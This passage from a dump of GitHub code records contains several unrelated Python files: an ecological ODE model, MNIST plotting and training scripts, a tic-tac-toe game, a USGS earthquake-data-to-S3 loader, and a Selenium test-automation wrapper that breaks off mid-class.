uniform_var(self.rng, 0.4, self.a_var, size=(self.N_p, self.N_a))\n self.b_max = uniform_var(self.rng, 0.4, self.a_var, size=(self.N_p, self.N_a))\n self.kappa = uniform_var(self.rng, 0.4, self.a_var, size=(self.N_p, self.N_a))\n self.g = uniform_var(self.rng, 0.4, self.p_var, size=self.N_p)\n self.u = uniform_var(self.rng, 0.002, self.p_var, size=self.N_p)\n self.w = uniform_var(self.rng, 1.2, self.p_var, size=self.N_p)\n self.beta = uniform_var(self.rng, 0.2, self.p_var, size=self.N_p)\n self.phi = uniform_var(self.rng, 0.04, self.p_var, size=self.N_p)\n self.G = uniform_var(self.rng, 2, self.a_var, size=self.N_a)\n self.K = uniform_var(self.rng, 20, self.a_var, size=self.N_a)\n\n def __repr__(self):\n return \"VM\"\n\n def LFR(self, R, P, i, j):\n return self.b[i, j] * R / P\n\n def LFR_vectorized(self, R, P):\n # self.b[i, j] * R / P\n return (self.b.T * (R / P)).T\n\n def NFR(self, R, P, i, j):\n return self.b_max[i, j] * (R[i] / (self.kappa[i, j] * P[i] + R[i]))\n\n def NFR_vectorized(self, R, P):\n # self.b_max[i, j] * (R[i] / (self.kappa[i, j] * P[i] + R))\n return self.b_max * (R / (self.kappa.T * P + R)).T\n\n def ode(self, t, z, dA):\n \"\"\"Full set of ODEs\n\n Returns:\n ODEs [np array]: full set of ODEs\n \"\"\"\n if isinstance(dA, (int, float)):\n _dA = dA\n elif isinstance(dA, (dict)):\n _dA = dA[\"func\"](t, *dA.get(\"args\", None))\n\n # unpack state variables\n P = z[:self.N_p]\n A = z[self.N_p:self.N]\n R = z[self.N:self.N+self.N_p]\n alpha = z[self.N+self.N_p:].reshape((self.N_p, self.N_a))\n\n F = self.LFR_vectorized(R, P)\n\n V = ((alpha * self.tau).T * P).T * A + self.mu\n\n sigma = V / V.sum(axis=0)\n\n gamma = self.g * (1 - self.u @ P - (self.w - self.u) * P)\n\n # calculate the differential equations\n plant_ODEs = gamma * (self.e * sigma * V).sum(axis=1) - (self.mu_p) * P\n\n poll_ODEs = (self.c * V * F).sum(axis=0) - (self.mu_a + _dA) * A\n\n R_ODEs = self.beta * P - self.phi * R - (V * F).sum(axis=1)\n\n alpha_ODEs = (self.G * alpha * (\n ((self.c * self.tau * F).T * P).T -\\\n (self.tau.T * P).T * (alpha * self.c * F).sum(axis=0)\n )).flatten()\n\n return np.concatenate((plant_ODEs, poll_ODEs, R_ODEs, alpha_ODEs))\n\n def solve(self, t_end, dA=0, n_steps=int(1e6), y0=None, save_period=0):\n \"\"\"Numerical solver of ODEs. Makes use of solve_ivp() function of scipy\n\n Returns:\n sol [obj]: numerical solution of ODE in a scipy Bunch object\n \"\"\"\n t_span = (0, t_end)\n\n # If no initial conditions are provided, use default initial conditions.\n if y0 is None:\n y0 = uniform_var(self.rng, 0.5, self.p_var, self.N_p)\n y0 = np.concatenate((y0, uniform_var(self.rng, 0.5, self.p_var, self.N_a)))\n y0 = np.concatenate((y0, uniform_var(self.rng, 0.5, self.p_var, self.N_p)))\n alpha = copy.deepcopy(self.alpha0)\n y0 = np.concatenate((y0, alpha.flatten()))\n\n save_partial = {\n \"ind\": (self.N + self.N_p, y0.shape[0]-1),\n \"save_period\": save_period\n }\n\n t0 = timer()\n sol = solve_ode(\n self.ode, t_span, y0, n_steps, args=(dA,), save_partial=save_partial\n )\n print(f\"Solved Valdovinos Model in {timer()-t0:.2f} seconds...\\n\")\n self.set_sol(sol)\n return sol\n","repo_name":"vvvasconcelos/pollcomm","sub_path":"pollcomm/valdovinos.py","file_name":"valdovinos.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71374672467","text":"import matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport os\nimport pandas as pd\nimport numpy as np\n\nfrom results import *\nimport results as R\nfrom results.utils import *\n\n\ndef plot_confidence_vs_count_60(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_confidence_vs_count_60\")\n # load rotated 60° dataframes\n df_dict = {os.path.basename(path): load_csv(os.path.join(\n path, 'mnist_rotate60.csv')) for path in res_dir_list}\n res_df = pd.DataFrame()\n\n confidence_range = np.arange(0, 1, .01)\n for k in df_dict:\n # select data based on confidence value\n count_list = list()\n for cv in confidence_range:\n count_df = df_dict[k].loc[df_dict[k]['t_confidence'] > cv]\n ratio = count_df.iloc[:, 0].count(\n ) / df_dict[k]['t_confidence'].count()\n count_list.append(ratio)\n\n # save grouped data\n res_df[k] = pd.Series(count_list, index=list(confidence_range))\n\n # plot\n fig = plt.figure()\n ax1 = fig.subplots(nrows=1)\n fig.suptitle(\"Confidence vs Count \\n(Rotated 60°)\")\n x_formatter = ticker.FormatStrFormatter(\"%.2f\")\n y_formatter = ticker.PercentFormatter(xmax=1.0)\n\n ax1.xaxis.set_major_formatter(x_formatter)\n ax1.yaxis.set_major_formatter(y_formatter)\n ax1.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, 1)\n\n for k in res_df:\n ax1.scatter(res_df[k].index, res_df[k], label=k, s=8)\n\n ax1.set_ylabel(r\"Fraction of examples with $p(y|x) > \\tau$\")\n ax1.set_xlabel(r\"Confidence ($\\tau$)\")\n side_legend(ax1)\n return fig\n\n\ndef plot_confidence_vs_accuracy_60(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_confidence_vs_accuracy_60\")\n # load rotated 60° dataframes\n df_dict = {os.path.basename(path): load_csv(os.path.join(\n path, 'mnist_rotate60.csv')) for path in res_dir_list}\n res_df = pd.DataFrame()\n\n X_MAX = .55\n confidence_range = np.arange(0, X_MAX, .01)\n for k in df_dict:\n # select data based on confidence value\n acc_list = list()\n for cv in confidence_range:\n acc_df = df_dict[k].loc[df_dict[k]['t_confidence'] > cv]\n accuracy = get_accuracy(acc_df)\n acc_list.append(accuracy)\n\n # save grouped data\n res_df[k] = pd.Series(acc_list, index=list(confidence_range))\n\n # plot\n fig = plt.figure()\n ax1 = fig.subplots(nrows=1)\n fig.suptitle(\"Confidence vs Accuracy \\n(Rotated 60°)\")\n formatter = ticker.FormatStrFormatter(\"%.2f\")\n\n ax1.xaxis.set_major_formatter(formatter)\n ax1.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, X_MAX)\n\n for k in res_df:\n ax1.scatter(res_df[k].index, res_df[k], label=k, s=8)\n\n ax1.set_ylabel(r\"Accuracy on examples $p(y|x) > \\tau$\")\n ax1.set_xlabel(r\"Confidence ($\\tau$)\")\n side_legend(ax1)\n return fig\n\n\ndef plot_shifted(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_shifted\")\n # get shifted results\n shifted_df_dict = get_shifted_df(res_dir_list)\n\n # plot\n fig = plt.figure()\n (ax1, ax2) = fig.subplots(nrows=2)\n fig.suptitle(\"Translated\\n(MNIST)\")\n formatter = ticker.FormatStrFormatter(\"%dpx\")\n\n ax1.xaxis.set_major_formatter(formatter)\n ax2.xaxis.set_major_formatter(formatter)\n ax1.grid(True)\n ax2.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax2.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, 14)\n ax2.set_xlim(0, 14)\n ax1.set_ylim(0, 1)\n xticks = range(0, 16, 2)\n\n for k in shifted_df_dict:\n ax1.plot(xticks, shifted_df_dict[k]['accuracy'], label=k)\n ax2.plot(xticks, shifted_df_dict[k]['brier_score'], label=k)\n\n ax1.set_ylabel(\"Accuracy\")\n ax2.set_ylabel(\"Brier score\")\n ax2.set_xlabel(\"Pixels translation\")\n side_legend(ax2)\n return fig\n\n\ndef plot_rotated(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_rotated\")\n # get rotated results\n rotated_df_dict = get_rotated_df(res_dir_list)\n\n # plot\n fig = plt.figure()\n (ax1, ax2) = fig.subplots(nrows=2)\n fig.suptitle(\"Rotated\\n(MNIST)\")\n formatter = ticker.FormatStrFormatter(\"%d°\")\n\n ax1.xaxis.set_major_formatter(formatter)\n ax2.xaxis.set_major_formatter(formatter)\n ax1.grid(True)\n ax2.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax2.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, 180)\n ax2.set_xlim(0, 180)\n ax1.set_ylim(0, 1)\n xticks = range(0, 195, 15)\n\n for k in rotated_df_dict:\n ax1.plot(xticks, rotated_df_dict[k]['accuracy'], label=k)\n ax2.plot(xticks, rotated_df_dict[k]['brier_score'], label=k)\n\n ax1.set_ylabel(\"Accuracy\")\n ax2.set_ylabel(\"Brier score\")\n ax2.set_xlabel(\"Degrees of rotation\")\n side_legend(ax2)\n return fig\n","repo_name":"FilippoVajana/master-degree","sub_path":"results/shifted_plots.py","file_name":"shifted_plots.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24547211490","text":"import random\r\n\r\ndef print_board(board):\r\n print(\"|\" + board[0] + \"|\" + board[1] + \"|\" + board[2] + \"|\")\r\n print(\"|\" + board[3] + \"|\" + board[4] + \"|\" + board[5] + \"|\")\r\n print(\"|\" + board[6] + \"|\" + board[7] + \"|\" + board[8] + \"|\")\r\n\r\ndef player_move(board, player):\r\n position = int(input(\"Pick a position from 0 to 8:\"))\r\n if position >= 0 and position <= 8 and board[position] == '_':\r\n board[position] = player\r\n else:\r\n print(\"That's not a valid location\")\r\n\r\ndef computer_move(board):\r\n position = random.randint(0, 8)\r\n while board[position] != '_':\r\n position = random.randint(0, 8)\r\n board[position] = 'O'\r\n\r\ndef winner(board):\r\n winning_positions = [\r\n [0, 1, 2], [3, 4, 5], [6, 7, 8], # rows\r\n [0, 3, 6], [1, 4, 7], [2, 5, 8], # columns\r\n [0, 4, 8], [2, 4, 6] # diagonals\r\n ]\r\n for pos in winning_positions:\r\n if all(board[p] == 'X' for p in pos):\r\n return 'X'\r\n elif all(board[p] == 'O' for p in pos):\r\n return 'O'\r\n if '_' not in board:\r\n return 'Tie'\r\n return None\r\n\r\ndef play_game():\r\n board = ['_' for _ in range(9)]\r\n print(\"Ready to play Tic Tac Toe!\")\r\n print_board(board)\r\n player = 'X'\r\n while True:\r\n if player == 'X':\r\n player_move(board, player)\r\n else:\r\n computer_move(board)\r\n print_board(board)\r\n result = winner(board)\r\n if result is not None:\r\n if result == 'Tie':\r\n print(\"It's a tie!\")\r\n else:\r\n print(f\"{result} won!\")\r\n break\r\n player = 'X' if player == 'O' else 'O'\r\n\r\nplay_game()\r\n","repo_name":"chaos-hunter/Tictactoe-proj","sub_path":"TICTACTOE.py","file_name":"TICTACTOE.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7785673545","text":"'''\nLasagne MNIST Example / Tutorial\n\n'''\n\nfrom __future__ import print_function\n\nimport cPickle as pickle\nimport gzip\nimport itertools\nimport urllib\n\nimport numpy as np\nimport lasagne\nimport theano\nimport theano.tensor as T\n\n\nDATA_URL = 'http://deeplearning.net/data/mnist/mnist.pkl.gz'\nDATA_FILENAME = 'mnist.pkl.gz'\n\nNUM_EPOCHS = 500\nBATCH_SIZE = 600\nNUM_HIDDEN_UNITS = 512\nLEARNING_RATE = 0.01\nMOMENTUM = 0.9\n\n\ndef _load_data(url=DATA_URL, filename=DATA_FILENAME):\n urllib.urlretrieve(url, filename)\n with gzip.open(filename, 'rb') as f:\n data = pickle.load(f)\n return data\n\ndef load_data():\n data = _load_data()\n X_train, y_train = data[0]\n X_valid, y_valid = data[1]\n X_test, y_test = data[2]\n\n return dict(\n X_train=theano.shared(lasagne.utils.floatX(X_train)),\n y_train=T.cast(theano.shared(y_train), 'int32'),\n X_valid=theano.shared(lasagne.utils.floatX(X_valid)),\n y_valid=T.cast(theano.shared(y_valid), 'int32'),\n X_test=theano.shared(lasagne.utils.floatX(X_test)),\n y_test=T.cast(theano.shared(y_test), 'int32'),\n num_examples_train=X_train.shape[0],\n num_examples_valid=X_valid.shape[0],\n num_examples_test=X_test.shape[0],\n input_dim=X_train.shape[1],\n output_dim=10,\n )\n\ndef build_model(input_dim, output_dim,\n batch_size=BATCH_SIZE, num_hidden_units=NUM_HIDDEN_UNITS):\n\n '''\n Define neural net structure. \n\n Tune neural net hyper parameters input, output and hidden number of units.\n\n '''\n l_in = lasagne.layers.InputLayer(\n shape=(batch_size, input_dim),\n )\n l_hidden1 = lasagne.layers.DenseLayer(\n l_in,\n num_units=num_hidden_units,\n nonlinearity=lasagne.nonlinearities.rectify,\n )\n # Regularizatoin with dropout -randomly drop neurons and connections in training\n l_hidden1_dropout = lasagne.layers.DropoutLayer(\n l_hidden1,\n p=0.5,\n )\n l_hidden2 = lasagne.layers.DenseLayer(\n l_hidden1_dropout,\n num_units=num_hidden_units,\n nonlinearity=lasagne.nonlinearities.rectify,\n )\n l_hidden2_dropout = lasagne.layers.DropoutLayer(\n l_hidden2,\n p=0.5,\n )\n l_out = lasagne.layers.DenseLayer(\n l_hidden2_dropout,\n num_units=output_dim,\n nonlinearity=lasagne.nonlinearities.softmax,\n )\n\n return l_out\n\ndef create_iter_functions(dataset, output_layer,\n X_tensor_type=T.matrix,\n batch_size=BATCH_SIZE,\n learning_rate=LEARNING_RATE, momentum=MOMENTUM):\n '''\n Define neural net methods to tune structure\n '''\n\n batch_index = T.iscalar('batch_index')\n X_batch = X_tensor_type('x')\n y_batch = T.ivector('y')\n batch_slice = slice(batch_index * batch_size, (batch_index + 1) * batch_size)\n\n def loss(output): # negative log likelihood\n return -T.mean(T.log(output)[T.arange(y_batch.shape[0]), y_batch])\n\n loss_train = loss(output_layer.get_output(X_batch))\n loss_eval = loss(output_layer.get_output(X_batch, deterministic=True))\n\n pred = T.argmax(\n output_layer.get_output(X_batch, deterministic=True), axis=1)\n\n accuracy = T.mean(T.eq(pred, y_batch)) # error rate\n\n all_params = lasagne.layers.get_all_params(output_layer)\n updates = lasagne.updates.nesterov_momentum(\n loss_train, all_params, learning_rate, momentum)\n\n iter_train = theano.function(\n [batch_index], loss_train,\n updates=updates,\n givens={\n X_batch: dataset['X_train'][batch_slice],\n y_batch: dataset['y_train'][batch_slice],\n },\n )\n\n iter_valid = theano.function(\n [batch_index], [loss_eval, accuracy],\n givens={\n X_batch: dataset['X_valid'][batch_slice],\n y_batch: dataset['y_valid'][batch_slice],\n },\n )\n\n iter_test = theano.function(\n [batch_index], [loss_eval, accuracy],\n givens={\n X_batch: dataset['X_test'][batch_slice],\n y_batch: dataset['y_test'][batch_slice],\n },\n )\n\n return dict(\n train=iter_train,\n valid=iter_valid,\n test=iter_test,\n )\n\n\ndef train(iter_funcs, dataset, batch_size=BATCH_SIZE):\n num_batches_train = dataset['num_examples_train'] // batch_size\n num_batches_valid = dataset['num_examples_valid'] // batch_size\n num_batches_test = dataset['num_examples_test'] // batch_size\n\n for epoch in itertools.count(1):\n batch_train_losses = []\n for b in range(num_batches_train):\n batch_train_loss = iter_funcs['train'](b)\n batch_train_losses.append(batch_train_loss)\n\n avg_train_loss = np.mean(batch_train_losses)\n\n batch_valid_losses = []\n batch_valid_accuracies = []\n for b in range(num_batches_valid):\n batch_valid_loss, batch_valid_accuracy = iter_funcs['valid'](b)\n batch_valid_losses.append(batch_valid_loss)\n batch_valid_accuracies.append(batch_valid_accuracy)\n\n avg_valid_loss = np.mean(batch_valid_losses)\n avg_valid_accuracy = np.mean(batch_valid_accuracies)\n\n yield {\n 'number': epoch,\n 'train_loss': avg_train_loss,\n 'valid_loss': avg_valid_loss,\n 'valid_accuracy': avg_valid_accuracy,\n } \n\n\ndef main(num_epochs=NUM_EPOCHS):\n print('... loading and seting-up data')\n dataset = load_data()\n\n print('... building the model structure')\n output_layer = build_model(\n input_dim=dataset['input_dim'],\n output_dim=dataset['output_dim'],\n )\n iter_funcs = create_iter_functions(dataset, output_layer)\n\n print('... training the model')\n for epoch in train(iter_funcs, dataset):\n print(\"Epoch %d of %d\" % (epoch['number'], num_epochs))\n print(\" training loss:\\t\\t%.6f\" % epoch['train_loss'])\n print(\" validation loss:\\t\\t%.6f\" % epoch['valid_loss'])\n print(\" validation accuracy:\\t\\t%.2f %%\" %\n (epoch['valid_accuracy'] * 100))\n\n if epoch['number'] >= num_epochs:\n break\n\n return output_layer\n\n\nif __name__ == '__main__':\n main()","repo_name":"nyghtowl/Neural_Net_Newbies","sub_path":"lib/lasagne_mnist.py","file_name":"lasagne_mnist.py","file_ext":"py","file_size_in_byte":6265,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"48"} +{"seq_id":"30062924616","text":"#!/usr/bin/python3\n\"\"\"\nretroactive_month.py was written to collect data from the beginning of the\ncurrent API version, May 22nd, 2013\nThe month parameter was limited to 30 days due to a \"Error 400: Bad Request\nmatching events exceeds search limit of 20000\"\nWith a little investigation, the average month contained 11,000 events\n\"\"\"\nimport yaml\nimport os\nimport requests\nimport datetime\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\ndef main(months):\n \"\"\"\n Take in one argument, months: int\n This pulls all earthquakes recored monthly (30 days)\n 1. Import credentials\n 2. Connect to S3, 'bucketshakesforyou'\n 3. Create date specific timestamp\n 4. Pull from usgs.gov website\n 5. Save as json string\n 6. Create Key(s) based on relevant day(s) timestamp\n 7. Push to S3\n \"\"\"\n\n credentials = yaml.load(open(os.path.expanduser\n ('/vagrant/credentials.yml')))\n\n aws_cred = credentials['aws']\n conn = S3Connection(aws_access_key_id=aws_cred['access_key_id'],\n aws_secret_access_key=aws_cred['secret_access_key'])\n\n production_version = datetime.date(2013,5,22)\n beg_month = production_version\n # for a more robust code:\n # today = datetime.date.today()\n # while end_day < today:\n # if end_day > today:\n # end_day = today\n for month in range(1, months):\n bucket = conn.get_bucket('bucketshakesforyou')\n end_month = datetime.timedelta(days=30)\n end_day = beg_month + end_month\n start_day = beg_month\n start = start_day.strftime('%Y-%m-%d')\n end = end_day.strftime('%Y-%m-%d')\n url_str = \"https://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&\"\\\n + \"starttime=\" + start + \"&endtime=\" + end\n\n r = requests.get(url_str)\n\n k = Key(bucket)\n k.key = start\n k.set_contents_from_string(r.text)\n beg_month += end_month\n\n\nif __name__ == '__main__':\n # to capture all data from production_version until current date the month\n # parameter was set to 49\n main(49)\n","repo_name":"adamszabunio/ShakeShakeShake","sub_path":"retroactive_month.py","file_name":"retroactive_month.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74386014865","text":"import os\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver import DesiredCapabilities, ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom UI_framework.Logger import Logger\n\n\nclass BlueRose(object):\n \"\"\"\n 对selenium框架的二次开发,更能体现\n \"\"\"\n\n def logging(func):\n logger = Logger('blueRose.log', level='debug').logger\n\n def wrapper(*args, **kwargs):\n if (args.__len__() > 1):\n logger.info(func.__name__ + ' 执行 ' + args[1])\n else:\n logger.info(func.__name__ + ' 执行')\n return func(*args, **kwargs)\n\n return wrapper\n\n #\n def __init__(self, browser='firefox', isMultitask=False):\n self.logger = Logger('blueRose.log', level='debug').logger\n self.seconds = 30\n # 存储错误截图的列表\n self.imgs = []\n if isMultitask:\n self.initMultitaskDriver(browser, serverUrl='http://localhost:4444/wd/hub')\n else:\n self.initDriver(browser)\n\n def initDriver(self, browser='firefox', wait_time=5):\n \"\"\"\n 浏览器:默认为火狐浏览器,但是可以选择谷歌或者IE浏览器;\n 打开浏览器的实践默认为5s,可修改;\n 当输入的游览器不在\"firefox\"\"Firefox\"\"chrome\"\"Chrome\"\"ie\"\"IE\"中时,断言Flase\n \"\"\"\n try:\n if browser == \"firefox\" or browser == \"Firefox\":\n self.driver = webdriver.Firefox()\n elif browser == \"chrome\" or browser == \"Chrome\":\n self.driver = webdriver.Chrome()\n elif browser == \"ie\" or browser == \"IE\":\n self.driver = webdriver.Ie()\n self.driver.implicitly_wait(wait_time)\n except Exception:\n self.logger.error(\"Not found this browser,You can enter 'firefox', 'chrome', 'ie'.\")\n assert False\n\n def initMultitaskDriver(self, browser='firefox', serverUrl='http://127.0.0.1:4444/wd/hub', wait_time=5):\n try:\n if browser == \"firefox\" or browser == \"Firefox\":\n self.driver = webdriver.Remote(command_executor=serverUrl,\n desired_capabilities=DesiredCapabilities.FIREFOX)\n elif browser == \"chrome\" or browser == \"Chrome\":\n self.driver = webdriver.Remote(command_executor=serverUrl,\n desired_capabilities=DesiredCapabilities.CHROME)\n\n elif browser == \"ie\" or browser == \"IE\":\n self.driver = webdriver.Remote(command_executor=serverUrl,\n desired_capabilities=DesiredCapabilities.INTERNETEXPLORER)\n self.driver.implicitly_wait(wait_time)\n except Exception:\n self.logger.error(\"Not found this browser,You can enter 'firefox', 'chrome', 'ie'.\")\n assert False\n\n def get(self, url):\n \"\"\"\n 打开某网址\n\n 举例:打开网址百度\n driver.get(\"https://www.baidu.com\")\n \"\"\"\n self.driver.get(url)\n\n def max_window(self):\n \"\"\"\n 将当前页面最大化.\n\n 举例:将当前页面最大化\n driver.max_window()\n \"\"\"\n self.driver.maximize_window()\n\n def set_window_size(self, wide, high):\n \"\"\"\n 设置浏览器的大小.\n\n 举例:设置浏览器的大小为宽1000,高1000\n driver.set_window_size(1000,1000)\n \"\"\"\n self.driver.set_window_size(wide, high)\n\n def wait(self, secsonds):\n \"\"\"\n 设置显示等待时间.\n\n 举例:等待10s\n driver.wait(10)\n \"\"\"\n self.driver.implicitly_wait(secsonds)\n\n def find_element(self, element):\n \"\"\"\n 选择定位方式并且定位元素,利用\"=\"号连接\n\n 举例:\n driver.find_element(\"id=kw\")\n \"\"\"\n if \"=\" not in element:\n self.logger.error(\"SyntaxError: invalid syntax, lack of '='.\")\n assert False\n else:\n try:\n \"\"\"\n 根据输入获取元素类型和对应路径\n 类型:\"id\",\"name\",\"class\",\"text\",\"xpath\",\"css\"\n \"\"\"\n by = element[0: element.find(\"=\")]\n value = element[element.find(\"=\") + 1: len(element)]\n\n if by == \"id\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.ID, value)))\n return self.driver.find_element_by_id(value)\n elif by == \"name\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.NAME, value)))\n return self.driver.find_element_by_name(value)\n elif by == \"class\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.CLASS_NAME, value)))\n return self.driver.find_element_by_class_name(value)\n elif by == \"text\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.LINK_TEXT, value)))\n return self.driver.find_element_by_link_text(value)\n elif by == \"xpath\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.XPATH, value)))\n return self.driver.find_element_by_xpath(value)\n elif by == \"css\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, value)))\n return self.driver.find_element_by_css_selector(value)\n else:\n self.logger.error(\n \"Please enter the correct targeting elements,'id','name','class','text','xpath','css'.\")\n assert False\n except Exception:\n # self.imgs.append(self.driver.get_screenshot_as_base64())\n self.logger.exception(\"Time out can not find the element,the screen shot is:\" + self.get_screenshot())\n assert False\n\n def find_elements(self, element, index):\n \"\"\"\n 判断元素定位方式和索引,返回元素。\n\n 举例:找到id为kw的元素的第一个,并返回\n driver.find_element(\"id=kw\",1)\n \"\"\"\n if \"=\" not in element:\n self.logger.error(\"SyntaxError: invalid syntax, lack of '='.\")\n assert False\n else:\n try:\n by = element[0: element.find(\"=\")]\n value = element[element.find(\"=\") + 1:len(element)]\n\n if by == \"id\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.ID, value)))\n return self.driver.find_elements_by_id(value)[index]\n elif by == \"name\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.NAME, value)))\n return self.driver.find_elements_by_name(value)[index]\n elif by == \"class\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.CLASS_NAME, value)))\n return self.driver.find_elements_by_class_name(value)[index]\n elif by == \"text\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.LINK_TEXT, value)))\n return self.driver.find_elements_by_link_text(value)[index]\n elif by == \"xpath\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.XPATH, value)))\n return self.driver.find_elements_by_xpath(value)[index]\n elif by == \"css\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, value)))\n return self.driver.find_elements_by_css_selector(value)[index]\n elif by == \"tagName\":\n WebDriverWait(self.driver, self.seconds, 1).until(\n EC.visibility_of_element_located((By.TAG_NAME, value)))\n return self.driver.find_elements_by_tag_name(value)[index]\n else:\n self.logger.error(\n \"Please enter the correct targeting elements,'id','name','class','text','xpath','css'.\")\n assert False\n except Exception:\n self.logger.exception(\"Time out can not find the element,the screen shot is:\" + self.get_screenshot())\n assert False\n\n def send_keys(self, element, text):\n \"\"\"\n 定位元素并输入文本.\n 举例:定位id为kw的文本框,输入selenium\n driver.send_keys(\"id=kw\",\"selenium\")\n \"\"\"\n element = self.find_element(element)\n element.clear()\n element.send_keys(text)\n\n def send_keyBoardsEvent(self, element, keyEvent):\n \"\"\"\n 键盘事件操作.\n\n 举例:定位id为kw,按回车\n driver.send_keyBoardsEvent(\"id=kw\",\"Keys.ENTER\")\n \"\"\"\n self.find_element(element).send_keys(keyEvent)\n\n def send_keys_index(self, element, index, text):\n \"\"\"\n 先清除然后再输入。\n\n 举例:清除后输入selenium\n driver.send_keys_index(\"id=kw\",5,\"selenium\")\n \"\"\"\n element = self.find_elements(element, index)\n element.clear()\n element.send_keys(text)\n\n def click(self, element):\n \"\"\"\n 定位元素并点击\n\n 举例:定位id为kw的元素并点击\n driver.click(\"id=kw\")\n \"\"\"\n self.find_element(element).click()\n\n def click_index(self, element, index):\n \"\"\"\n 找到第几个元素并点击\n\n 举例:点击第5个id为kw的元素\n driver.click_index(\"id=kw\",5)\n \"\"\"\n self.find_elements(element, index).click()\n\n def right_click(self, element):\n \"\"\"\n 找到元素点击鼠标右键\n\n 举例:\n driver.right_click(\"class=right\")\n \"\"\"\n ActionChains(self.driver).context_click(self.find_element(element)).perform()\n\n def move_to_element(self, element):\n \"\"\"\n 将鼠标移动到元素上\n\n 举例:将鼠标移动到css为choose的元素上\n driver.move_to_element(\"css=choose\")\n \"\"\"\n ActionChains(self.driver).move_to_element(self.find_element(element)).perform()\n\n def double_click(self, element):\n \"\"\"\n 找到元素双击.\n\n 举例:双击name是baidu的元素\n driver.double_click(\"name=baidu\")\n \"\"\"\n ActionChains(self.driver).double_click(self.find_element(element)).perform()\n\n def drag_and_drop(self, source_element, target_element):\n \"\"\"\n 将元素拖到目标地址.\n\n 举例:将id为s的元素拖拽到id为t的元素上\n driver.drag_and_drop(\"id=s\",\"id=t\")\n \"\"\"\n ActionChains(self.driver).drag_and_drop(self.find_element(source_element),\n self.find_element(target_element)).perform()\n\n def back(self):\n \"\"\"\n 返回上一页,相当于浏览器最上部的左箭头.\n\n 举例:返回上一页\n driver.back()\n \"\"\"\n self.driver.back()\n\n def forward(self):\n \"\"\"\n 前进到下一页,相当于浏览器最上部的右箭头.\n\n 举例:前进到下一页\n driver.forward()\n \"\"\"\n self.driver.forward()\n\n def get_attribute(self, element, attribute):\n \"\"\"\n 得到元素属性的值。\n\n 举例:获取id为kw元素的属性值\n driver.get_attribute(\"id=kw\",\"attribute\")\n \"\"\"\n return self.find_element(element).get_attribute(attribute)\n\n def get_text(self, element):\n \"\"\"\n 得到元素的文本内容.\n\n 举例:\n driver.get_text(\"name=johnny\")\n \"\"\"\n return self.find_element(element).text\n\n def get_display(self, element):\n \"\"\"\n 判断要获取显示的元素是否可现实,返回结果为true或false。\n\n 举例:判断id为app的元素是否可现实\n driver.get_display(\"id=ppp\")\n \"\"\"\n return self.find_element(element).is_displayed()\n\n def get_title(self):\n \"\"\"\n 获得网页标题.\n\n 举例:\n driver.get_title()\n \"\"\"\n return self.driver.title\n\n def get_url(self):\n \"\"\"\n 获取当前页的URL地址。\n\n 举例:\n driver.get_url()\n \"\"\"\n return self.driver.current_url\n\n def get_screenshot_as_base64(self):\n return self.driver.get_screenshot_as_base64()\n\n def get_screenshot(self):\n \"\"\"\n 截图,并保存\n\n 举例:获取当前页面的截图\n driver.get_screenshot()\n \"\"\"\n current_time = time.strftime(\"%Y-%m-%d-%H_%M_%S\", time.localtime(time.time()))\n current_date = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n pic_path = os.path.abspath(os.path.dirname(os.getcwd())) + \"\\\\result\\\\screenshot\\\\\" + current_date\n pic_name = current_time + '.png'\n if os.path.exists(pic_path):\n pass\n else:\n # 创建多层级的文件夹\n os.makedirs(pic_path)\n self.driver.get_screenshot_as_file(pic_path + '\\\\' + pic_name)\n return pic_path + '\\\\' + pic_name\n\n def submit(self, element):\n \"\"\"\n 表达提交.\n\n 举例:\n driver.submit(\"id=mainFrame\")\n \"\"\"\n self.find_element(element).submit()\n\n def switch_to_frame(self, element):\n \"\"\"\n 切换frame.\n\n 